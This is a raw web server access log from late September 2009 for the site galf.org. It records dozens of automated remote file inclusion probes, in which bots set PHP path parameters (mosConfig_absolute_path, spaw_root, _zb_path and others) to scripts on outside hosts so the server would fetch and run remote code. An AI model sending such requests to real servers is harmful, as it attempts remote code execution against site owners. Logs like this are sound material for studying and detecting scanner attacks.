69.147.225.158 - - [28/Sep/2009:02:52:38 -0700] "GET /logs/access_090824.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.147.225.158 - - [28/Sep/2009:02:52:38 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.147.225.158 - - [28/Sep/2009:02:52:38 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.147.225.158 - - [28/Sep/2009:02:52:45 -0700] "GET /logs/access_090824.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.147.225.158 - - [28/Sep/2009:02:52:45 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.147.225.158 - - [28/Sep/2009:02:52:46 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.147.225.158 - - [28/Sep/2009:02:53:37 -0700] "GET /logs/access_090824.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.147.225.158 - - [28/Sep/2009:02:53:37 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.147.225.158 - - [28/Sep/2009:02:53:38 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.102.6.154 - - [28/Sep/2009:02:53:44 -0700] "GET /logs/access_090824.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.102.6.154 - - [28/Sep/2009:02:53:44 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.102.6.154 - - [28/Sep/2009:02:53:44 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.147.225.158 - - [28/Sep/2009:02:53:55 -0700] "GET /logs/access_090914.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.147.225.158 - - [28/Sep/2009:02:54:25 -0700] "GET /logs/access_090824.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.102.6.154 - - [28/Sep/2009:02:55:04 -0700] "GET /logs/access_090914.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.147.225.158 - - [28/Sep/2009:02:55:05 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.147.225.158 - - [28/Sep/2009:02:55:05 -0700] "GET /logs/access_090420.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.147.225.158 - - [28/Sep/2009:02:55:05 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.147.225.158 - - [28/Sep/2009:02:55:13 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.147.225.158 - - [28/Sep/2009:02:55:17 -0700] "GET /logs/access_090914.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
70.38.112.174 - - [28/Sep/2009:02:55:22 -0700] "GET /logs/access_090309.log//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://shephoe.fileave.com/fxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
70.38.112.174 - - [28/Sep/2009:02:55:22 -0700] "GET /logs/access_090720.log//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://shephoe.fileave.com/fxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
70.38.112.174 - - [28/Sep/2009:02:55:34 -0700] "GET /logs/access_090309.log//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://shephoe.fileave.com/fxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
70.38.112.174 - - [28/Sep/2009:02:55:35 -0700] "GET /logs/access_090720.log//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://shephoe.fileave.com/fxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.147.225.158 - - [28/Sep/2009:02:56:45 -0700] "GET /logs/access_090914.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.86.24.26 - - [28/Sep/2009:02:57:00 -0700] "GET /logs/access_090629.log%20%20/errors.php?error=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.86.24.26 - - [28/Sep/2009:02:57:00 -0700] "GET /errors.php?error=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.86.24.26 - - [28/Sep/2009:02:57:00 -0700] "GET /logs/errors.php?error=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.86.24.26 - - [28/Sep/2009:02:57:15 -0700] "GET /logs/access_090914.log%20%20/errors.php?error=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.86.24.26 - - [28/Sep/2009:02:57:23 -0700] "GET /logs/access_090629.log%20%20/errors.php?error=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.86.24.26 - - [28/Sep/2009:02:57:23 -0700] "GET /logs/errors.php?error=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.86.24.26 - - [28/Sep/2009:02:57:23 -0700] "GET /errors.php?error=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.86.24.26 - - [28/Sep/2009:02:57:33 -0700] "GET /logs/access_090914.log%20%20/errors.php?error=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.102.6.154 - - [28/Sep/2009:02:57:34 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.102.6.154 - - [28/Sep/2009:02:57:34 -0700] "GET /logs/access_090824.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.102.6.154 - - [28/Sep/2009:02:57:34 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.102.6.154 - - [28/Sep/2009:02:58:21 -0700] "GET /logs/access_090824.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.102.6.154 - - [28/Sep/2009:02:58:47 -0700] "GET /logs/access_090420.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.102.6.154 - - [28/Sep/2009:02:58:47 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.102.6.154 - - [28/Sep/2009:02:58:47 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.102.6.154 - - [28/Sep/2009:02:58:52 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.43.206.220 - - [28/Sep/2009:02:59:21 -0700] "GET /logs/access_090525.log//newspublish/include.php?path[docroot]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.43.206.220 - - [28/Sep/2009:02:59:22 -0700] "GET /logs/access_090720.log//newspublish/include.php?path[docroot]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.102.6.154 - - [28/Sep/2009:03:00:01 -0700] "GET /logs/access_090914.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
86.109.109.87 - - [28/Sep/2009:03:01:40 -0700] "GET /logs/access.log%20%20/?_zb_path=http://www.positiva.gov.co/id1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
86.109.109.87 - - [28/Sep/2009:03:01:40 -0700] "GET /logs/?_zb_path=http://www.positiva.gov.co/id1.gif??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "galf.org"
86.109.109.87 - - [28/Sep/2009:03:01:41 -0700] "GET /?_zb_path=http://www.positiva.gov.co/id1.gif??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
211.43.206.220 - - [28/Sep/2009:03:07:55 -0700] "GET /logs/access.log//newspublish/include.php?path[docroot]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.147.225.158 - - [28/Sep/2009:03:08:57 -0700] "GET /logs/access_090914.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
86.109.109.87 - - [28/Sep/2009:03:09:35 -0700] "GET /logs/access_090420.log/?_zb_path=http://www.positiva.gov.co/id1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
86.109.109.87 - - [28/Sep/2009:03:09:35 -0700] "GET /?_zb_path=http://www.positiva.gov.co/id1.gif??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
86.109.109.87 - - [28/Sep/2009:03:09:35 -0700] "GET /logs/?_zb_path=http://www.positiva.gov.co/id1.gif??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
86.109.109.87 - - [28/Sep/2009:03:09:50 -0700] "GET /logs/access.log/?_zb_path=http://www.positiva.gov.co/id1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
94.102.6.154 - - [28/Sep/2009:03:10:01 -0700] "GET /logs/access_090914.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.147.225.158 - - [28/Sep/2009:03:13:31 -0700] "GET /logs/access_090420.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.147.225.158 - - [28/Sep/2009:03:13:31 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.202.2.64 - - [28/Sep/2009:03:13:32 -0700] "GET /admin/auth.php?xcart_dir=http://ngelitik.org/cyberirc/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.202.2.64 - - [28/Sep/2009:03:13:32 -0700] "GET /logs//admin/auth.php?xcart_dir=http://ngelitik.org/cyberirc/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.202.2.64 - - [28/Sep/2009:03:13:32 -0700] "GET /logs/access_090810.log//admin/auth.php?xcart_dir=http://ngelitik.org/cyberirc/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.102.6.154 - - [28/Sep/2009:03:14:05 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.102.6.154 - - [28/Sep/2009:03:14:05 -0700] "GET /logs/access_090420.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
89.187.131.186 - - [28/Sep/2009:03:21:43 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pipp0.interfree.it/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
89.187.131.186 - - [28/Sep/2009:03:21:43 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pipp0.interfree.it/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
89.187.131.186 - - [28/Sep/2009:03:21:43 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pipp0.interfree.it/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
206.225.23.4 - - [28/Sep/2009:03:23:29 -0700] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
206.225.23.4 - - [28/Sep/2009:03:23:29 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
206.225.23.4 - - [28/Sep/2009:03:23:30 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 200 4805 "-" "libwww-perl/5.805" "www.galf.org"
206.225.23.4 - - [28/Sep/2009:03:24:45 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
94.102.6.154 - - [28/Sep/2009:03:25:10 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
94.102.6.154 - - [28/Sep/2009:03:25:10 -0700] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
94.102.6.154 - - [28/Sep/2009:03:25:10 -0700] "GET /logs/access.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.147.225.158 - - [28/Sep/2009:03:25:47 -0700] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.147.225.158 - - [28/Sep/2009:03:25:47 -0700] "GET /logs/access.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.147.225.158 - - [28/Sep/2009:03:25:47 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
58.184.252.3 - - [28/Sep/2009:03:26:59 -0700] "GET /e404.php?DOCUMENT_ROOT=http://www.partyplans.com.au/forum2/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [28/Sep/2009:03:26:59 -0700] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.partyplans.com.au/forum2/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [28/Sep/2009:03:27:00 -0700] "GET /logs/access_090309.log/e404.php?DOCUMENT_ROOT=http://www.partyplans.com.au/forum2/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.102.6.154 - - [28/Sep/2009:03:27:20 -0700] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
94.102.6.154 - - [28/Sep/2009:03:27:20 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
94.102.6.154 - - [28/Sep/2009:03:27:20 -0700] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.147.225.158 - - [28/Sep/2009:03:27:20 -0700] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.147.225.158 - - [28/Sep/2009:03:27:20 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.147.225.158 - - [28/Sep/2009:03:27:20 -0700] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
58.184.252.3 - - [28/Sep/2009:03:28:48 -0700] "GET /logs/access_090223.log/e404.php?DOCUMENT_ROOT=http://www.partyplans.com.au/forum2/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [28/Sep/2009:03:30:29 -0700] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [28/Sep/2009:03:30:29 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [28/Sep/2009:03:30:29 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [28/Sep/2009:03:30:40 -0700] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
187.50.237.170 - - [28/Sep/2009:03:31:17 -0700] "GET /logs/access.log%20%20/?_zb_path=http://www.positiva.gov.co/id1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
187.50.237.170 - - [28/Sep/2009:03:31:17 -0700] "GET /logs/?_zb_path=http://www.positiva.gov.co/id1.gif??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "galf.org"
187.50.237.170 - - [28/Sep/2009:03:31:17 -0700] "GET /?_zb_path=http://www.positiva.gov.co/id1.gif??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
121.101.214.54 - - [28/Sep/2009:03:32:50 -0700] "GET /logs/access_090810.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.zytologie.de//id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Sep/2009:03:32:51 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.zytologie.de//id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Sep/2009:03:32:51 -0700] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.zytologie.de//id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [28/Sep/2009:03:35:10 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [28/Sep/2009:03:35:10 -0700] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [28/Sep/2009:03:35:10 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
61.100.5.136 - - [28/Sep/2009:03:35:21 -0700] "GET /logs/access_090420.log%20%20//header.php?base_folder=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.100.5.136 - - [28/Sep/2009:03:35:21 -0700] "GET /logs//header.php?base_folder=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.100.5.136 - - [28/Sep/2009:03:35:21 -0700] "GET /header.php?base_folder=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.147.225.158 - - [28/Sep/2009:03:36:56 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.147.225.158 - - [28/Sep/2009:03:36:56 -0700] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.147.225.158 - - [28/Sep/2009:03:36:56 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.102.6.154 - - [28/Sep/2009:03:37:11 -0700] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
